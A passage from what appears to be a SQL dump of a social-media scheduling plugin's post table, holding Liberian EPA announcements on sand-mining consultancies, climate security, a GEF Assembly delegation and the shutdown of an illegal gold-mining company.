generations.\",\"edit\":false,\"isAllImages\":true,\"isLinkCard\":false,\"link\":\"\",\"media\":[{\"name\":\"yesterday-news.jpeg\",\"uid\":5848,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2026\\/03\\/yesterday-news.jpeg\"}]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-03-27 07:32:19',NULL,NULL,'2026-03-27 07:32:18','2026-03-27 07:32:19'),(4,'Call for Expression of Interest to provide Short-Term Consultancy/Technical Support: National Consultant – Economic and Market Expert','{\"settings\":{\"name\":\"Call for Expression of Interest to provide Short-Term Consultancy\\/Technical Support: National Consultant \\u2013 Economic and Market Expert\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"Project Background\\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity-friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\\n\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":true,\"link\":\"https:\\/\\/ekmsliberia.info\\/ekms-bulletin\\/call-for-expression-of-interest-to-provide-short-term-consultancy-technical-support-national-consultant-economic-and-market-expert\\/\",\"media\":[{\"name\":\"Screenshot-2026-03-27-at-14.34.06.png\",\"uid\":5852,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2026\\/03\\/Screenshot-2026-03-27-at-14.34.06.png\"}]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-03-27 19:38:56',NULL,NULL,'2026-03-27 19:38:55','2026-03-27 19:38:56'),(2,'“Climate Crisis Becoming Security Threat in Liberia”…Director Yarkpawolo tells UN','{\"settings\":{\"name\":\"\\u201cClimate Crisis Becoming Security Threat in Liberia\\u201d\\u2026Director Yarkpawolo tells UN\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"At the United Nations Headquarters, Liberia has warned that climate change is no longer just an environmental issue but a serious threat to peace and security.\\n\\nDelivering Liberia\\u2019s national statement on March 26, 2026, the Executive Director of the Environmental Protection Agency, Dr. Emmanuel K. Urey Yarkpawolo, told members of the Group of Friends on Climate & Security that the country is already feeling the impact.\\n\\nHe said rising sea levels and strong coastal erosion are forcing many people from their homes. According to him, this situation is affecting livelihoods and creating tension in communities.\\n\\n\\u201cThis is not only an environmental problem. It is now a human security issue,\\u201d Dr. Yarkpawolo said.\\n\\nHe explained that people who lose their homes and land often move to other areas, leading to disputes over land and resources. These tensions, he noted, can grow into bigger conflicts if not handled well.\\n\\nDr. Yarkpawolo also spoke about the wider region, especially the Sahel, where long dry seasons and poor farming conditions are pushing young men to move south in search of better life. He named countries like Burkina Faso as places where many migrants are coming from.\\n\\nHe said some of these migrants are entering forest areas in Liberia to farm crops like cocoa. While this helps them survive, it is putting more pressure on land and forests and sometimes causes problems with local communities.\\n\\n\\u201cThe risk of conflict is growing quietly,\\u201d he warned.\\n\\nDespite the challenges, the EPA boss said Liberia is working to address the problem. He spoke about programs that are helping young people find jobs while protecting the environment. These include eco-brigades, mangrove restoration, and community peace efforts.\\n\\nHe said these actions are helping to reduce tension and build trust among people.\\n\\nLiberia is also trying to connect climate work with peacebuilding. Dr. Yarkpawolo said projects on the coast now include building protection, restoring nature, and supporting local people at the same time.\\n\\nHe called on the international community to support countries like Liberia with funding and technical help. He said climate finance and strong partnerships are needed to prevent future conflicts.\\n\\n\\u201cWe cannot talk about climate change without talking about security,\\u201d he said. \\u201cAnd we cannot have peace without dealing with climate problems.\\u201d\\n\\nDr. Yarkpawolo added that Liberia is ready to work with partners to turn climate challenges into opportunities for peace and development.\",\"edit\":false,\"isAllImages\":true,\"isLinkCard\":false,\"link\":\"\",\"media\":[{\"name\":\"today-news.jpeg\",\"uid\":5845,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2026\\/03\\/today-news.jpeg\"}]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-03-27 07:28:09',NULL,NULL,'2026-03-27 07:28:08','2026-03-27 07:28:09'),(5,'Call for Expression of Interest to provide Short-Term Consultancy/Technical Support: Consultancy Type & Title: National Consultant – Stakeholder, Gender and Social Inclusion Expert','{\"settings\":{\"name\":\"Call for Expression of Interest to provide Short-Term Consultancy\\/Technical Support: Consultancy Type & Title: National Consultant \\u2013 Stakeholder, Gender and Social Inclusion Expert\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"Project Background\\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity- friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\\n\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":true,\"link\":\"https:\\/\\/ekmsliberia.info\\/ekms-bulletin\\/call-for-expression-of-interest-to-provide-short-term-consultancy-technical-support-consultancy-type-title-national-consultant-stakeholder-gender-and-social-inclusion-expert\\/\",\"media\":[]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-03-27 19:53:28',NULL,NULL,'2026-03-27 19:53:27','2026-03-27 19:53:28'),(6,'Call for Expression of Interest to provide Short-Term Consultancy/Technical Support: National Consultant – Policy, Legal, and Institutional Expert','{\"settings\":{\"name\":\"Call for Expression of Interest to provide Short-Term Consultancy\\/Technical Support: National Consultant \\u2013 Policy, Legal, and Institutional Expert\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"Project Background\\n\\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity-friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\\n\\n\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":true,\"link\":\"https:\\/\\/ekmsliberia.info\\/ekms-bulletin\\/call-for-expression-of-interest-to-provide-short-term-consultancy-technical-support-national-consultant-policy-legal-and-institutional-expert\\/\",\"media\":[]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-03-27 20:52:47',NULL,NULL,'2026-03-27 20:52:46','2026-03-27 20:52:47'),(7,'Re post: Call for Expression of Interest to provide Short-Term Consultancy/Technical Support: National Consultant – Policy, Legal, and Institutional Expert','{\"settings\":{\"name\":\"Re post: Call for Expression of Interest to provide Short-Term Consultancy\\/Technical Support: National Consultant \\u2013 Policy, Legal, and Institutional Expert\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"Project Background\\n\\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity-friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\\n\\n\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":true,\"link\":\"https:\\/\\/ekmsliberia.info\\/ekms-bulletin\\/call-for-expression-of-interest-to-provide-short-term-consultancy-technical-support-national-consultant-policy-legal-and-institutional-expert\\/\",\"media\":[]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-03-27 20:56:12',NULL,NULL,'2026-03-27 20:56:12','2026-03-27 20:56:12'),(10,'Liberian Delegation Participates in the 8th GEF Assembly and 71st GEF Council Meeting in Samarkand, Uzbekistan','{\"settings\":{\"name\":\"Liberian Delegation Participates in the 8th GEF Assembly and 71st GEF Council Meeting in Samarkand, Uzbekistan\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"Samarkand, Uzbekistan \\u2014 May 30, 2026: A high-level Liberian delegation is participating in the 8th Assembly of the Global Environment Facility (GEF) and the 71st Meeting of the GEF Council in Samarkand, Uzbekistan.\\nThe 8th GEF Assembly is being held from May 30 to June 6, 2026, while the 71st GEF Council Meeting is scheduled from May 31 to June 3, 2026. According to the GEF, the Council meeting brings together country representatives to consider policies, strategic directions, work programs, and financing decisions under the GEF family of funds. The Assembly, which is the highest governing body of the GEF, convenes every four years and brings together the GEF\\u2019s 186 member countries to discuss global environmental priorities, financing solutions, and partnerships for addressing climate change, biodiversity loss, land degradation, chemicals and waste, and other major environmental challenges. (thegef.org)\\nLiberia\\u2019s participation is significant because the country continues to benefit from GEF support in the areas of climate resilience, biodiversity conservation, coastal defense, sustainable land management, and improved environmental governance. The GEF remains one of Liberia\\u2019s most important multilateral partners for mobilizing grants and technical support to address urgent environmental and climate challenges.\\nAs part of the ongoing meetings, Liberia participated in the West African Constituency Meeting, where countries within the constituency discussed common priorities, challenges, and positions ahead of the Council deliberations. Liberia was represented by Dr. Emmanuel K. Urey Yarkpawolo, Executive Director of the Environmental Protection Agency of Liberia and Operational Focal Point for the GEF; Mr. Benjamin Karmorh, Chief Technical Advisor; and Mr. Desmond Thompson, Alternative Operational Focal Point.\\nSpeaking during the meeting, Dr. Urey Yarkpawolo expressed Liberia\\u2019s appreciation to the GEF for its continued support to the country. He informed the gathering that Liberia is currently implementing a US$10 million coastal defense project and that, this week, the country launched another US$10 million project supporting agriculture, fisheries, tourism, and related biodiversity initiatives.\\nDr. Urey Yarkpawolo also raised concern about the GEF\\u2019s high co-financing expectation, noting that the current 7:1 co-financing ratio means that for every US$1 provided by the GEF, a beneficiary country is expected to demonstrate US$7 in co-financing. He emphasized that such a requirement is very high for vulnerable and least developed countries like Liberia, which are already facing serious fiscal constraints while responding to climate change, coastal erosion, biodiversity loss, and other environmental threats. The GEF indicated that the matter would be looked into.\\nDr. Urey Yarkpawolo also highlighted the urgency of sea level rise and associated sea erosion. He emphasized that Liberia\\u2019s coastal cities and communities are all threatened by sea erosion, an\",\"edit\":false,\"isAllImages\":true,\"isLinkCard\":false,\"link\":\"\",\"media\":[{\"name\":\"today-now.jpeg\",\"uid\":5931,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2026\\/05\\/today-now.jpeg\"}]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-05-31 00:31:05',NULL,NULL,'2026-05-31 00:31:04','2026-05-31 00:31:05'),(11,'EPA Shuts Down Gannon Melina Group of Company for Illegal Mining and Environmental Pollution in Grand Gedeh County','{\"settings\":{\"name\":\"EPA Shuts Down Gannon Melina Group of Company for Illegal Mining and Environmental Pollution in Grand Gedeh County\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"Grand Gedeh County, May 23, 2026 \\u2013 The Environmental Protection Agency (EPA) commenced Day VI of the Nationwide Environmental Compliance Monitoring Exercise with an inspection of the operations of Gannon Melina Group of Company in Kahn Village, Gorbor Robert, Grand Gedeh County.\\n\\nThe company is engaged in Class C gold mining operations and was found operating with six excavator machines and two medium-sized gold processing plants at two separate mining sites.\\n\\nDuring the inspection, EPA officers observed several serious environmental violations. Among the most alarming findings was the diversion of the Slomehn Creek by the company to facilitate its mining activities. Inspectors also established that the company was operating without a valid Environmental Permit, in direct violation of Liberia\\u2019s Environmental Protection and Management Law.\\n\\nThe EPA further noted that the company\\u2019s activities have caused significant water pollution and extensive land degradation in the affected areas. Inspectors observed that previously mined portions of the concession had been abandoned without any restoration or rehabilitation measures, leaving the environment severely disturbed.\\n\\n\\nThe violations come months after the company\\u2019s operations were formally reported to the EPA on March 10, 2026, by residents of Pyne Town, Sanquin, Gbliyee, and Kwerteh Town through SAPO Campaigners. Community members accused the company of polluting the Slomehn Creek, a major waterway that flows into the Sanquin River in Carbadea, Sinoe County, thereby threatening downstream communities and aquatic ecosystems.\\n\\nFollowing the findings, the EPA enforcement team immediately ordered the shutdown of the company\\u2019s mining operations and issued two separate non-compliance notices for:\\n\\n1. Operating without a valid Environmental Permit; and\\n\\n2. Causing environmental pollution and land degradation.\\n\\nThe Agency emphasized that the diversion of natural watercourses, pollution of water bodies, and failure to restore mined-out areas constitute serious breaches of environmental regulations and pose significant risks to public health, biodiversity, and local livelihoods.\\n\\nThe EPA reaffirmed its commitment to protecting Liberia\\u2019s environment and natural resources, stressing that no company will be allowed to operate outside the framework of the law.\",\"edit\":false,\"isAllImages\":true,\"isLinkCard\":false,\"link\":\"\",\"media\":[{\"name\":\"epa-news-ce.jpg\",\"uid\":5911,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2026\\/05\\/epa-news-ce.jpg\"},{\"name\":\"epa-news-cand-e.jpg\",\"uid\":5912,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2026\\/05\\/epa-news-cand-e.jpg\"}]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-05-31 00:50:17',NULL,NULL,'2026-05-31 00:50:16','2026-05-31 00:50:17'),(12,'National Consultancy to Develop a Project Knowledge Management and Communications Strategy ','{\"settings\":{\"name\":\"National Consultancy to Develop a Project Knowledge Management and Communications Strategy 